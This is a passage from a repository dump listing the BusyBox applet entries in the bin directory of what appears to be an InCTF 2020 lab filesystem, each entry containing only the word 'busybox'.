-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/diff: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dirname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dmesg: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dnsd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dnsdomainname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dos2unix: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/du: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dumpkmap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dumpleases: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/echo: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ed: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/egrep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/eject: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/env: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/envdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/envuidgid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ether-wake: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/expand: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/expr: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fakeidentd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/false: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fbset: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fbsplash: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fdflush: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fdformat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fdisk: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fgconsole: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fgrep: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/find: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/findfs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/flock: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fold: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/free: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/freeramdisk: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fsck: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fsck.minix: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fsync: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ftpd: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ftpget: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ftpput: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fuser: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/getopt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/getty: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/grep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/groups: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/gunzip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/gzip: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/halt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hdparm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/head: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hexdump: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hostid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hostname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/httpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hush: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hwclock: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/id: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifconfig: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifdown: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifenslave: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifplugd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/inetd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/init: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/insmod: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/install: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ionice: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iostat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipaddr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipcalc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipcrm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipcs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iplink: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iproute: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iprule: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iptunnel: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/kbd_mode: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/kill: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/killall: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/killall5: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/klogd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/last: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/less: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/linux32: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/linux64: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/linuxrc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ln: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/loadfont: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/loadkmap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/logger: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/login: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/logname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/logread: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/losetup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lpq: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lpr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ls: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsattr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsof: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lspci: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsusb: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzma: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzop: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzopcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/makedevs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/makemime: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/man: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/md5sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mdev: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mesg: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/microcom: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkdosfs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mke2fs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfifo: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfs.ext2: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfs.minix: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfs.vfat: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mknod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkpasswd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkswap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mktemp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/modinfo: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/modprobe: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/more: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mount: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mountpoint: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mpstat: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nameif: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nanddump: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nandwrite: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nbd-client: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/netstat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nice: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nmeter: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nohup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nslookup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ntpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/od: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/openvt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/passwd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/patch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pgrep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pidof: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ping: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ping6: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pipe_progress: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pivot_root: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pkill: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pmap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/popmaildir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/poweroff: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/powertop: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/printenv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/printf: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ps: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pscan: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pstree: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pwd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pwdx: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/raidautorun: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rdate: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rdev: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/readahead: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/readlink: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/readprofile: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/realpath: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/reboot: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/reformime: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/remove-shell: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/renice: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/reset: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/resize: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rev: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rmdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rmmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/route: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rpm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rpm2cpio: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rtcwake: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/run-parts: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/runlevel: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/runsv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/runsvdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rx: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/script: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/scriptreplay: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sed: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sendmail: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/seq: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setarch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setconsole: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setfont: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setkeycodes: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setlogcons: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setserial: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setsid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setuidgid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sh: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sha1sum: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sha256sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sha512sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/showkey: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/slattach: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sleep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/smemcap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/softlimit: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sort: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/split: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/start-stop-daemon: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/stat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/strings: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/stty: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/su: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sulogin: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/svlogd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/swapoff: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/swapon: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/switch_root: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sync: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sysctl: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/syslogd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tac: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tail: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tar: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tcpsvd: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tee: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/telnet: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/telnetd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/test: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tftp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tftpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/time: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/timeout: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/top: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/touch: 
